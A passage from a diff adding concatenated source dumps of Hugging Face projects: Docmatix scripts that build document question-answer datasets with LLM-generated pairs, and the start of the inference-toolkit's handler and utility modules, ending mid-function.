246
+
247
+ def process_group(key_group):
248
+ try:
249
+ (key, group) = key_group
250
+ qa_pairs = []
251
+ for (_, row) in group.iterrows():
252
+ question = re.sub('^Q\\d+: ', '', row['question'])
253
+ answer = re.sub('^A\\d+: ', '', row['answer'])
254
+ if is_valid_question_or_answer(question) and is_valid_question_or_answer(answer):
255
+ qa_pairs.append({'user': question, 'assistant': answer, 'source': 'PDFA key: ' + str(row['__key__'])})
256
+ if qa_pairs:
257
+ return {'texts': qa_pairs, 'pdf': group['pdf'].iloc[0]}
258
+ except Exception as e:
259
+ print(f'Error processing group {key}: {e}')
260
+ return None
261
+
262
+ def process_tar_index(tar_index, step_size, question_answer_df):
263
+ shard_nr = tar_index // step_size
264
+ loaded_datasets = []
265
+ for inner_idx in range(step_size):
266
+ tar_file = os.path.join(DATA_PATH, TAR_FILE_PATTERN.format(tar_index + inner_idx))
267
+ try:
268
+ print(f'Loading dataset from: {tar_file}')
269
+ hf_dataset = datasets.load_dataset('webdataset', split='train', data_files=tar_file, cache_dir='/fsx/.cache').to_pandas()
270
+ hf_dataset.__key__ = hf_dataset.__key__.apply(pd.to_numeric)
271
+ loaded_datasets.append(hf_dataset)
272
+ except Exception as e:
273
+ print(f'Error loading dataset from: {tar_file}')
274
+ print(e)
275
+ hf_dataset = pd.concat(loaded_datasets, ignore_index=True)
276
+ print(f'Concatenated datasets with {len(hf_dataset)} samples')
277
+ hf_dataset = hf_dataset[hf_dataset['__key__'].isin(question_answer_df['__key__'].unique())]
278
+ merged_df = pd.merge(hf_dataset, question_answer_df, on='__key__', how='inner')
279
+ data_extracted = []
280
+ max_threads = 10
281
+ with ThreadPoolExecutor(max_threads) as executor:
282
+ results = list(tqdm(executor.map(process_group, merged_df.groupby('__key__')), desc='Extracting data', total=len(merged_df['__key__'].unique())))
283
+ data_extracted.extend(results)
284
+ data_extracted = list(filter(lambda item: item is not None, data_extracted))
285
+ FEATURES = datasets.Features({'pdf': datasets.Value('binary'), 'texts': [{'user': datasets.Value('string'), 'assistant': datasets.Value('string'), 'source': datasets.Value('string')}]})
286
+
287
+ def data_generator():
288
+ for data_dict in data_extracted:
289
+ yield data_dict
290
+ ds_shard = datasets.Dataset.from_generator(data_generator, features=FEATURES, writer_batch_size=100, cache_dir='/fsx/.cache')
291
+ ds_shard.save_to_disk(f'/fsx/m4/datasets/docmatix_pdf/shard_{shard_nr}')
292
+
293
+ def load_and_concatenate_dataframes():
294
+ if os.path.exists('/fsx/andi/llm-swarm/concatenated_synthetic_dataset.parquet.gzip'):
295
+ return pd.read_parquet('/fsx/andi/llm-swarm/concatenated_synthetic_dataset.parquet.gzip')
296
+ directory = '.'
297
+ all_files = os.listdir(directory)
298
+ h5_files = sorted([f for f in all_files if re.match('synthetic_dataset_batch_\\d+\\.h5$', f)])
299
+ dataframes = []
300
+ for file in tqdm(h5_files, desc='Loading data'):
301
+ file_path = os.path.join(directory, file)
302
+ df = pd.read_hdf(file_path)
303
+ if '__key__' not in df.columns:
304
+ raise ValueError(f'Key column not found in {file_path}')
305
+ df.__key__ = df.__key__.apply(pd.to_numeric)
306
+ dataframes.append(df)
307
+ concatenated_df = pd.concat(dataframes, ignore_index=True)
308
+ concatenated_df.to_parquet('concatenated_synthetic_dataset.parquet.gzip', compression='gzip')
309
+ return concatenated_df
310
+ if __name__ == '__main__':
311
+ parser = argparse.ArgumentParser(description='Process .h5 files and tar indices.')
312
+ parser.add_argument('--start_index', type=int, default=0, help='The starting index for tar processing.')
313
+ parser.add_argument('--step_size', type=int, default=1, help='The step size for tar processing.')
314
+ args = parser.parse_args()
315
+ question_answer_df = load_and_concatenate_dataframes()
316
+ print(len(question_answer_df))
317
+ process_tar_index(args.start_index, args.step_size, question_answer_df=question_answer_df)
318
+
319
+ # File: docmatix-main/create_only_with_pdfs/upload_data.py
320
+ from datasets import load_from_disk, concatenate_datasets
321
+ from tqdm import tqdm
322
+ import os
323
+
324
+ def get_datasets():
325
+ if os.path.isdir('/fsx/m4/datasets/docmatix_pdf/concatenated'):
326
+ return load_from_disk('/fsx/m4/datasets/docmatix_pdf/concatenated')
327
+ hf_datasets = []
328
+ for shard_nr in tqdm(range(200)):
329
+ try:
330
+ hf_datasets.append(load_from_disk(f'/fsx/m4/datasets/docmatix_pdf/shard_{shard_nr}'))
331
+ except Exception as e:
332
+ print(f'Error loading dataset from: {shard_nr}')
333
+ print(e)
334
+ hf_data = concatenate_datasets(hf_datasets)
335
+ hf_data.save_to_disk('/fsx/m4/datasets/docmatix_pdf/concatenated')
336
+ return hf_data
337
+ data = get_datasets()
338
+ print(data.features)
339
+ print(data[0]['texts'])
340
+ print(data[0]['pdf'][:10])
341
+ print(len(data))
342
+ data.push_to_hub('HuggingFaceM4/Docmatix', 'pdf')
343
+
344
+ # File: docmatix-main/florence_2_dataset/create_florence_2_dataset.py
345
+ from functools import partial
346
+ from datasets import load_from_disk, concatenate_datasets
347
+ from tqdm import tqdm
348
+ import re
349
+ import pandas as pd
350
+ import os
351
+ import datasets
352
+ IMAGE_FEATURES = datasets.Features({'image': datasets.Image(decode=True), '__key__': datasets.Value('int64')})
353
+ TEXT_FEATURES = datasets.Features({'question': datasets.Value('string'), 'answer': datasets.Value('string'), '__key__': datasets.Value('int64')})
354
+
355
+ def text_generator(df_text):
356
+ for (i, row) in df_text.iterrows():
357
+ print(i, row['__key__'])
358
+ yield {'question': row['question'], 'answer': row['answer'], '__key__': row['__key__']}
359
+
360
+ def img_generator(df_img):
361
+ for (i, row) in df_img.iterrows():
362
+ print(i, row['__key__'])
363
+ yield {'image': row['images'][0], '__key__': row['__key__']}
364
+ pre_key_len = len('PDFA key: ')
365
+ for shard_number in tqdm(range(0, 200)):
366
+ try:
367
+ if os.path.exists(f'/fsx/m4/datasets/florence_vqa_instruct/shard_{shard_number}') and os.path.exists(f'/fsx/m4/datasets/florence_vqa_instruct_images/shard_{shard_number}'):
368
+ continue
369
+ df_data = load_from_disk(f'/fsx/m4/datasets/docvqa_instruct/shard_{shard_number}').to_pandas()
370
+ df_data['__key__'] = df_data.texts.apply(lambda x: x[0]['source'][pre_key_len:])
371
+ df_data['__key__'] = df_data['__key__'].apply(pd.to_numeric)
372
+ df_images = df_data[['images', '__key__']].copy()
373
+ df_images = df_images[df_images['images'].apply(len) <= 1]
374
+ df_texts = df_data[['texts']].explode('texts')
375
+ df_texts['question'] = df_texts['texts'].apply(lambda x: x.get('user'))
376
+ df_texts['answer'] = df_texts['texts'].apply(lambda x: x.get('assistant'))
377
+ df_texts['__key__'] = df_texts['texts'].apply(lambda x: x.get('source')[pre_key_len:])
378
+ df_texts['__key__'] = df_texts['__key__'].apply(pd.to_numeric)
379
+ df_texts = df_texts[df_texts['__key__'].isin(df_images['__key__'].unique())]
380
+ df_texts.drop(columns=['texts'], inplace=True)
381
+ df_texts = df_texts[df_texts['question'].apply(lambda x: len(x.split()) <= 900)]
382
+ df_texts = df_texts[df_texts['answer'].apply(lambda x: len(x.split()) <= 900)]
383
+ df_images = df_images[df_images['__key__'].isin(df_texts['__key__'].unique())]
384
+ ds_text = datasets.Dataset.from_generator(partial(text_generator, df_texts), features=TEXT_FEATURES, writer_batch_size=100, cache_dir='/fsx/.cache')
385
+ ds_text.save_to_disk(f'/fsx/m4/datasets/florence_vqa_instruct/shard_{shard_number}')
386
+ df_image = datasets.Dataset.from_generator(partial(img_generator, df_images), features=IMAGE_FEATURES, writer_batch_size=100, cache_dir='/fsx/.cache')
387
+ df_image.save_to_disk(f'/fsx/m4/datasets/florence_vqa_instruct_images/shard_{shard_number}')
388
+ print(f'Finished processing shard: {shard_number}')
389
+ except:
390
+ print(f'shard {shard_number} failed')
391
+ all_ds = []
392
+ for shard in tqdm(range(0, 200)):
393
+ try:
394
+ data = load_from_disk(f'/fsx/m4/datasets/florence_vqa_instruct/shard_{shard}')
395
+ all_ds.append(data)
396
+ except:
397
+ print(f'shard {shard} failed')
398
+ all_ds = concatenate_datasets(all_ds)
399
+ all_ds.save_to_disk('/fsx/m4/datasets/complete_florence_vqa_instruct', num_proc=96)
400
+
401
+ # File: docmatix-main/generation/base_prompts.py
402
+ BASE_PROMPT = '\nYou are reading text extracted from a PDF with several pages. The pages are divided by a line saying \'NEW PAGE\'. \nYour role is to {role_description}. If the type of questions requested are impossible to generate due to the simplicity of the document, default to simpler factual questions.\nThe PDFs might contain tables or images that are poorly parsed in the text. Avoid asking questions about these.\nIf the text seems to only contain uninteresting information, output "unanswerable" as the answer.\nHere are some examples for questions that follow your role:\n{examples}\n'
403
+ BASE_USER_CONTENT = 'The text contained in the PDF is: \n{text} \n\nCreate the question answer pairs following this format:\nQ#: \nA#:\n\nIf you can\'t generate a questions for the text, write "unanswerable" as the answer.\n'
404
+ PROMPTS = [{'role_description': 'understand the content of the PDF and create as many pairs of questions and answers as you need to cover the content of the PDF comprehensively. The questions should be varied, covering factual information, inferences, and deeper analysis of the text.', 'examples': '\n Q1: What is the main topic of the document?\n A1: The main topic of the document is...\n \n Q2: What are the key points discussed in the first section?\n A2: The key points discussed in the first section include...\n\n Q3: How does the author support their argument about X?\n A3: The author supports their argument about X by...\n\n Q4: What can be inferred about Y from the document?\n A4: From the document, it can be inferred that Y...\n\n Q5: What are the implications of Z mentioned in the document?\n A5: The implications of Z mentioned in the document are...\n '}, {'role_description': 'focus on generating enough pairs of questions and answers for each section of the document to ensure a detailed and complete coverage the document.', 'examples': '\n Q1: What is the primary focus of the first section?\n A1: The primary focus of the first section is...\n\n Q2: What are the significant details mentioned in the second section?\n A2: The significant details mentioned in the second section include...\n\n Q3: How does the information in the third section relate to the overall topic of the document?\n A3: The information in the third section relates to the overall topic by...\n '}, {'role_description': 'understand the content of the PDF and create as many pairs of questions and answers as you need to cover the content of the PDF comprehensively. The questions should require critical thinking and analysis.', 'examples': '\n Q1: What arguments does the author present in support of their thesis?\n A1: The arguments presented by the author in support of their thesis include...\n\n Q2: How does the author compare X and Y in the text?\n A2: The author compares X and Y by...\n\n Q3: What are the potential implications of the findings discussed in the document?\n A3: The potential implications of the findings are...\n '}, {'role_description': 'create as many pairs of questions and answers as you need to cover both summaries of sections and specific details. Ensure a coverage of broad themes and granular information.', 'examples': '\n Q1: What is the summary of the first section?\n A1: The summary of the first section is...\n\n Q2: What specific data or evidence is provided in the second section?\n A2: The specific data or evidence provided in the second section includes...\n\n Q3: How do the details in the third section support the main argument of the document?\n A3: The details in the third section support the main argument by...\n '}, {'role_description': 'understand the content of the PDF and create as many pairs of questions and answers as you need to cover the content of the PDF comprehensively. The questions should be varied, covering factual information, inferences, and deeper analysis of the text. The questions should be asked in a general manner without introducing details from the document itself.', 'examples': '\n Q1: What is the summary of the first section?\n A1: The first section, called xxx, can be summarized as is...\n\n Q2: What specific data or evidence is provided in the second section?\n A2: In the section called xxx, there is a much data and evidence presented, such as...\n\n Q3: How do the details in the third section support the main argument of the document?\n A3: The details in the section on "xxx" support the main argument by...\n '}]
405
+
406
+ def create_prompts(text):
407
+ prompts = []
408
+ for prompt in PROMPTS:
409
+ system_content = BASE_PROMPT.format(role_description=prompt['role_description'], examples=prompt['examples'])
410
+ prompts.append([{'role': 'system', 'content': system_content}, {'role': 'user', 'content': BASE_USER_CONTENT.format(text=text)}])
411
+ return prompts
412
+
413
+ # File: docmatix-main/generation/llm_swarm_script.py
414
+ import asyncio
415
+ import json
416
+ import os
417
+ import random
418
+ import re
419
+ from concurrent.futures import ThreadPoolExecutor
420
+ from typing import Any, Dict, List, Optional
421
+ import pandas as pd
422
+ from datasets import IterableDataset, load_dataset
423
+ from huggingface_hub import AsyncInferenceClient
424
+ from tqdm import trange
425
+ from tqdm.asyncio import tqdm_asyncio
426
+ from transformers import AutoTokenizer
427
+ from examples.question_answer_pairs.phase_1.base_prompts import BASE_PROMPT, BASE_USER_CONTENT, PROMPTS
428
+ from llm_swarm import LLMSwarm, LLMSwarmConfig
429
+ CHECKPOINT_FILE = 'checkpoint.json'
430
+ DATA_PATH = '/fsx/andi/pdfa_data/'
431
+ TAR_FILE_PATTERN = 'pdfa-eng-train-{:06d}.tar'
432
+ NUM_TAR_FILES = 1800
433
+ MAX_PAGES_PER_PDF = 4
434
+ STEP_SIZE = 10
435
+ model_id = 'microsoft/Phi-3-small-8k-instruct'
436
+
437
+ def create_llm_prompt(prompt, text):
438
+ system_content = BASE_PROMPT.format(role_description=prompt['role_description'], examples=prompt['examples'])
439
+ return [{'role': 'system', 'content': system_content}, {'role': 'user', 'content': BASE_USER_CONTENT.format(text=text)}]
440
+
441
+ def extract_text_per_page_from_sample(sample: Dict[str, Any]) -> List[str]:
442
+ texts = []
443
+ for page in sample['json']['pages']:
444
+ pages_text = ' \n '.join(page['lines']['text'])
445
+ texts.append(pages_text)
446
+ return texts
447
+
448
+ def extract_chunks(pages: List[Any], max_tokens_per_group: int, max_pages_per_group: int, n_overlap: int) -> List[str]:
449
+ chunks = []
450
+ current_chunk = []
451
+ current_chunk_tokens = 0
452
+ current_chunk_pages = 0
453
+ page_token_counts = [len(tokenizer.encode(page, add_special_tokens=False)) for page in pages]
454
+ for (i, page) in enumerate(pages):
455
+ page_tokens = page_token_counts[i]
456
+ if page_tokens > max_tokens_per_group:
457
+ print(f'Skipping document where page nr {i} has {page_tokens} tokens.')
458
+ return []
459
+ if current_chunk_tokens + page_tokens > max_tokens_per_group or current_chunk_pages + 1 > max_pages_per_group:
460
+ if current_chunk:
461
+ chunks.append('\nNEW PAGE\n'.join(current_chunk))
462
+ current_chunk = current_chunk[-n_overlap:] if n_overlap > 0 else []
463
+ current_chunk_tokens = sum(page_token_counts[max(0, i - n_overlap):i])
464
+ current_chunk_pages = len(current_chunk)
465
+ current_chunk.append(page)
466
+ current_chunk_tokens += page_tokens
467
+ current_chunk_pages += 1
468
+ if current_chunk:
469
+ chunks.append('\nNEW PAGE\n'.join(current_chunk))
470
+ return chunks
471
+
472
+ def create_tasks(dataset: IterableDataset, prompt_id: Optional[int]=None, n_overlap: int=2) -> List[Dict[str, Any]]:
473
+ if prompt_id is not None:
474
+ selected_id_prompt = prompt_id
475
+ tasks = []
476
+ for (index, sample) in dataset.iterrows():
477
+ text_per_page = extract_text_per_page_from_sample(sample)
478
+ if len(text_per_page) > MAX_PAGES_PER_PDF:
479
+ continue
480
+ page_chunks = extract_chunks(text_per_page, max_tokens_per_group=5000, max_pages_per_group=5, n_overlap=n_overlap)
481
+ for chunk in page_chunks:
482
+ if prompt_id is None:
483
+ selected_id_prompt = random.randint(0, 4)
484
+ prompt = PROMPTS[selected_id_prompt]
485
+ messages = create_llm_prompt(prompt, chunk)
486
+ prompt = tokenizer.apply_chat_template(messages, tokenize=False, add_generation_prompt=True)
487
+ tasks_dict = {'__key__': sample['__key__'], 'Page count': len(text_per_page), 'messages': prompt, 'Prompt ID': selected_id_prompt}
488
+ tasks.append(tasks_dict)
489
+ return tasks
490
+
491
+ def extract_qa_pairs(text):
492
+ qa_pattern = re.compile('(Q\\d+:\\s*.*?)(A\\d+:\\s*.*?)(?=(Q\\d+:)|$)', re.DOTALL)
493
+ matches = qa_pattern.findall(text)
494
+ qa_pairs = [(q.strip(), a.strip()) for match in matches for (q, a) in [match[:2]]]
495
+ return qa_pairs
496
+
497
+ def process_outputs_to_df(df):
498
+ all_data = []
499
+ for (index, row) in df.iterrows():
500
+ task = row['Task']
501
+ completion = row['Completion']
502
+ sample_key = task['__key__']
503
+ page_count = task['Page count']
504
+ prompt_id = task['Prompt ID']
505
+ qa_pairs = extract_qa_pairs(completion)
506
+ if len(qa_pairs) == 0:
507
+ print('No Q&A pairs found for sample:', sample_key)
508
+ for (question, answer) in qa_pairs:
509
+ all_data.append({'__key__': sample_key, 'Page count': page_count, 'Prompt ID': prompt_id, 'question': question, 'answer': answer})
510
+ qa_df = pd.DataFrame(all_data)
511
+ return qa_df
512
+
513
+ def save_checkpoint(tar_index, total_examples):
514
+ checkpoint_data = {'tar_index': tar_index, 'total_examples': total_examples}
515
+ with open(CHECKPOINT_FILE, 'w') as f:
516
+ json.dump(checkpoint_data, f)
517
+
518
+ def load_checkpoint():
519
+ if os.path.exists(CHECKPOINT_FILE):
520
+ with open(CHECKPOINT_FILE, 'r') as f:
521
+ return json.load(f)
522
+ return {'tar_index': 0, 'total_examples': 0}
523
+ tokenizer = AutoTokenizer.from_pretrained(model_id, trust_remote_code=True)
524
+
525
+ def launch():
526
+ with LLMSwarm(LLMSwarmConfig(instances=8, inference_engine='vllm', gpus=1, model=model_id, slurm_template_path='templates/vllm_h100.template.slurm', load_balancer_template_path='templates/nginx.template.conf', trust_remote_code=True, per_instance_max_parallel_requests=200)) as llm_swarm:
527
+ semaphore = asyncio.Semaphore(llm_swarm.suggested_max_parallel_requests)
528
+ client = AsyncInferenceClient(model=llm_swarm.endpoint)
529
+
530
+ async def process_text(prompt):
531
+ async with semaphore:
532
+ response = await client.post(json={'prompt': prompt, 'max_tokens': 2000})
533
+ res = json.loads(response.decode('utf-8'))['text'][0][len(prompt):]
534
+ return res
535
+
536
+ def load_and_process_dataset(tar_file):
537
+ try:
538
+ print(f'Loading dataset from: {tar_file}')
539
+ dataset = load_dataset('webdataset', split='train', data_files=tar_file).to_pandas()
540
+ tasks = create_tasks(dataset, prompt_id=None, n_overlap=1)
541
+ return tasks
542
+ except Exception as e:
543
+ print(f'Error loading dataset from: {tar_file}')
544
+ print(e)
545
+ return []
546
+
547
+ def get_future_tasks(tar_index, executor):
548
+ futures = []
549
+ for inner_idx in range(STEP_SIZE):
550
+ tar_file = os.path.join(DATA_PATH, TAR_FILE_PATTERN.format(tar_index + inner_idx))
551
+ futures.append(executor.submit(load_and_process_dataset, tar_file))
552
+ return futures
553
+
554
+ async def process_dataset(tar_index, total_examples):
555
+ next_future_tasks = get_future_tasks(tar_index, ThreadPoolExecutor(max_workers=STEP_SIZE))
556
+ for idx in trange(tar_index, NUM_TAR_FILES + STEP_SIZE, STEP_SIZE, desc='Creating Dataset'):
557
+ print(f'Processing tar file {idx}')
558
+ tasks = []
559
+ future_tasks = next_future_tasks
560
+ results = [f.result() for f in future_tasks]
561
+ for result in results:
562
+ tasks.extend(result)
563
+ next_future_tasks = get_future_tasks(idx + STEP_SIZE, ThreadPoolExecutor(max_workers=1))
564
+ results = await tqdm_asyncio.gather(*(process_text(task['messages']) for task in tasks))
565
+ df = pd.DataFrame({'Task': tasks, 'Completion': results})
566
+ df_new = process_outputs_to_df(df)
567
+ df_new.to_hdf(f'synthetic_dataset_batch_{idx}.h5', key='df', mode='w')
568
+ unique_keys = df_new['__key__'].nunique()
569
+ total_examples += unique_keys
570
+ save_checkpoint(idx, total_examples)
571
+
572
+ async def main():
573
+ checkpoint = load_checkpoint()
574
+ tar_index = checkpoint['tar_index']
575
+ if tar_index != 0:
576
+ tar_index += STEP_SIZE
577
+ print(f'Resuming from tar file {tar_index}')
578
+ total_examples = checkpoint['total_examples']
579
+ processor = asyncio.create_task(process_dataset(tar_index, total_examples))
580
+ await processor
581
+ print('All batches processed.')
582
+ asyncio.run(main())
583
+ launch()
584
+
585
+ # File: docmatix-main/zero_shot_exp/zero_shot.py
586
+ from datasets import Dataset, Features, Value, load_dataset, Image, Sequence
587
+ TEST_SUBSET_LEN = 200
588
+ TRAIN_SUBSET_LEN = 1700
589
+ FEATURES = Features({'images': Sequence(Image(decode=True)), 'texts': [{'user': Value('string'), 'assistant': Value('string'), 'source': Value('string')}]})
590
+ ds = load_dataset('HuggingFaceM4/Docmatix', 'images', streaming=True)
591
+ test_subset = []
592
+ train_subset = []
593
+ for (idx, sample) in enumerate(ds['train']):
594
+ if idx < TEST_SUBSET_LEN:
595
+ test_subset.append(sample)
596
+ if idx >= TEST_SUBSET_LEN - 1:
597
+ if idx >= TEST_SUBSET_LEN + TRAIN_SUBSET_LEN - 1:
598
+ break
599
+ train_subset.append(sample)
600
+ new_test_data = Dataset.from_list(test_subset, features=FEATURES)
601
+ new_train_data = Dataset.from_list(train_subset, features=FEATURES)
602
+ new_test_data.push_to_hub('HuggingFaceM4/Docmatix', 'zero-shot-exp', split='test')
603
+ new_train_data.push_to_hub('HuggingFaceM4/Docmatix', 'zero-shot-exp', split='train')
604
+
huggingface_evaluate.txt ADDED
The diff for this file is too large to render. See raw diff
 
huggingface_hugginface_datasets.txt ADDED
The diff for this file is too large to render. See raw diff
 
huggingface_huggingface-inference-toolkit.txt ADDED
@@ -0,0 +1,543 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ # File: huggingface-inference-toolkit-main/src/huggingface_inference_toolkit/async_utils.py
2
+ import functools
3
+ from typing import Any, Callable, Dict, TypeVar
4
+ import anyio
5
+ from anyio import Semaphore
6
+ from typing_extensions import ParamSpec
7
+ MAX_CONCURRENT_THREADS = 1
8
+ MAX_THREADS_GUARD = Semaphore(MAX_CONCURRENT_THREADS)
9
+ T = TypeVar('T')
10
+ P = ParamSpec('P')
11
+
12
+ async def async_handler_call(handler: Callable[P, T], body: Dict[str, Any]) -> T:
13
+ async with MAX_THREADS_GUARD:
14
+ return await anyio.to_thread.run_sync(functools.partial(handler, body))
15
+
16
+ # File: huggingface-inference-toolkit-main/src/huggingface_inference_toolkit/const.py
17
+ import os
18
+ from pathlib import Path
19
+ from huggingface_inference_toolkit.env_utils import strtobool
20
+ HF_MODEL_DIR = os.environ.get('HF_MODEL_DIR', '/opt/huggingface/model')
21
+ HF_MODEL_ID = os.environ.get('HF_MODEL_ID', None)
22
+ HF_TASK = os.environ.get('HF_TASK', None)
23
+ HF_FRAMEWORK = os.environ.get('HF_FRAMEWORK', None)
24
+ HF_REVISION = os.environ.get('HF_REVISION', None)
25
+ HF_HUB_TOKEN = os.environ.get('HF_HUB_TOKEN', None)
26
+ HF_TRUST_REMOTE_CODE = strtobool(os.environ.get('HF_TRUST_REMOTE_CODE', '0'))
27
+ HF_DEFAULT_PIPELINE_NAME = os.environ.get('HF_DEFAULT_PIPELINE_NAME', 'handler.py')
28
+ HF_MODULE_NAME = os.environ.get('HF_MODULE_NAME', f'{Path(HF_DEFAULT_PIPELINE_NAME).stem}.EndpointHandler')
29
+
30
+ # File: huggingface-inference-toolkit-main/src/huggingface_inference_toolkit/diffusers_utils.py
31
+ import importlib.util
32
+ from typing import Union
33
+ from transformers.utils.import_utils import is_torch_bf16_gpu_available
34
+ from huggingface_inference_toolkit.logging import logger
35
+ _diffusers = importlib.util.find_spec('diffusers') is not None
36
+
37
+ def is_diffusers_available():
38
+ return _diffusers
39
+ if is_diffusers_available():
40
+ import torch
41
+ from diffusers import AutoPipelineForText2Image, DPMSolverMultistepScheduler, StableDiffusionPipeline
42
+
43
+ class IEAutoPipelineForText2Image:
44
+
45
+ def __init__(self, model_dir: str, device: Union[str, None]=None, **kwargs):
46
+ dtype = torch.float32
47
+ if device == 'cuda':
48
+ dtype = torch.bfloat16 if is_torch_bf16_gpu_available() else torch.float16
49
+ device_map = 'balanced' if device == 'cuda' else None
50
+ self.pipeline = AutoPipelineForText2Image.from_pretrained(model_dir, torch_dtype=dtype, device_map=device_map, **kwargs)
51
+ if isinstance(self.pipeline, StableDiffusionPipeline):
52
+ try:
53
+ self.pipeline.scheduler = DPMSolverMultistepScheduler.from_config(self.pipeline.scheduler.config)
54
+ except Exception:
55
+ pass
56
+
57
+ def __call__(self, prompt, **kwargs):
58
+ if 'num_images_per_prompt' in kwargs:
59
+ kwargs.pop('num_images_per_prompt')
60
+ logger.warning('Sending num_images_per_prompt > 1 to pipeline is not supported. Using default value 1.')
61
+ out = self.pipeline(prompt, num_images_per_prompt=1, **kwargs)
62
+ return out.images[0]
63
+ DIFFUSERS_TASKS = {'text-to-image': IEAutoPipelineForText2Image}
64
+
65
+ def get_diffusers_pipeline(task=None, model_dir=None, device=-1, **kwargs):
66
+ device = 'cuda' if device == 0 else 'cpu'
67
+ pipeline = DIFFUSERS_TASKS[task](model_dir=model_dir, device=device, **kwargs)
68
+ return pipeline
69
+
70
+ # File: huggingface-inference-toolkit-main/src/huggingface_inference_toolkit/env_utils.py
71
+ def strtobool(val: str) -> bool:
72
+ val = val.lower()
73
+ if val in ('y', 'yes', 't', 'true', 'on', '1'):
74
+ return True
75
+ if val in ('n', 'no', 'f', 'false', 'off', '0'):
76
+ return False
77
+ raise ValueError(f'Invalid truth value, it should be a string but {val} was provided instead.')
78
+
79
+ # File: huggingface-inference-toolkit-main/src/huggingface_inference_toolkit/handler.py
80
+ import os
81
+ from pathlib import Path
82
+ from typing import Optional, Union
83
+ from huggingface_inference_toolkit.const import HF_TRUST_REMOTE_CODE
84
+ from huggingface_inference_toolkit.utils import check_and_register_custom_pipeline_from_directory, get_pipeline
85
+
86
+ class HuggingFaceHandler:
87
+
88
+ def __init__(self, model_dir: Union[str, Path], task=None, framework='pt'):
89
+ self.pipeline = get_pipeline(model_dir=model_dir, task=task, framework=framework, trust_remote_code=HF_TRUST_REMOTE_CODE)
90
+
91
+ def __call__(self, data):
92
+ inputs = data.pop('inputs', data)
93
+ parameters = data.pop('parameters', None)
94
+ if parameters is not None:
95
+ prediction = self.pipeline(inputs, **parameters)
96
+ else:
97
+ prediction = self.pipeline(inputs)
98
+ return prediction
99
+
100
+ class VertexAIHandler(HuggingFaceHandler):
101
+
102
+ def __init__(self, model_dir: Union[str, Path], task=None, framework='pt'):
103
+ super().__init__(model_dir, task, framework)
104
+
105
+ def __call__(self, data):
106
+ if 'instances' not in data:
107
+ raise ValueError("The request body must contain a key 'instances' with a list of instances.")
108
+ parameters = data.pop('parameters', None)
109
+ predictions = []
110
+ for inputs in data['instances']:
111
+ payload = {'inputs': inputs, 'parameters': parameters}
112
+ predictions.append(super().__call__(payload))
113
+ return {'predictions': predictions}
114
+
115
+ def get_inference_handler_either_custom_or_default_handler(model_dir: Path, task: Optional[str]=None):
116
+ custom_pipeline = check_and_register_custom_pipeline_from_directory(model_dir)
117
+ if custom_pipeline:
118
+ return custom_pipeline
119
+ elif os.environ.get('AIP_MODE', None) == 'PREDICTION':
120
+ return VertexAIHandler(model_dir=model_dir, task=task)
121
+ else:
122
+ return HuggingFaceHandler(model_dir=model_dir, task=task)
123
+
124
+ # File: huggingface-inference-toolkit-main/src/huggingface_inference_toolkit/logging.py
125
+ import logging
126
+ import sys
127
+
128
+ def setup_logging():
129
+ for handler in logging.root.handlers[:]:
130
+ logging.root.removeHandler(handler)
131
+ logging.basicConfig(level=logging.INFO, format='%(asctime)s - %(name)s - %(levelname)s - %(message)s', datefmt='%Y-%m-%d %H:%M:%S', stream=sys.stdout)
132
+ logging.getLogger('uvicorn').handlers.clear()
133
+ logging.getLogger('uvicorn.access').handlers.clear()
134
+ logging.getLogger('uvicorn.error').handlers.clear()
135
+ logger = logging.getLogger('huggingface_inference_toolkit')
136
+ return logger
137
+ logger = setup_logging()
138
+
139
+ # File: huggingface-inference-toolkit-main/src/huggingface_inference_toolkit/optimum_utils.py
140
+ import importlib.util
141
+ import os
142
+ from huggingface_inference_toolkit.logging import logger
143
+ _optimum_neuron = False
144
+ if importlib.util.find_spec('optimum') is not None:
145
+ if importlib.util.find_spec('optimum.neuron') is not None:
146
+ _optimum_neuron = True
147
+
148
+ def is_optimum_neuron_available():
149
+ return _optimum_neuron
150
+
151
+ def get_input_shapes(model_dir):
152
+ from transformers import AutoConfig
153
+ input_shapes = {}
154
+ input_shapes_available = False
155
+ try:
156
+ config = AutoConfig.from_pretrained(model_dir)
157
+ if hasattr(config, 'neuron'):
158
+ if config.neuron.get('static_batch_size', None) and config.neuron.get('static_sequence_length', None):
159
+ input_shapes['batch_size'] = config.neuron['static_batch_size']
160
+ input_shapes['sequence_length'] = config.neuron['static_sequence_length']
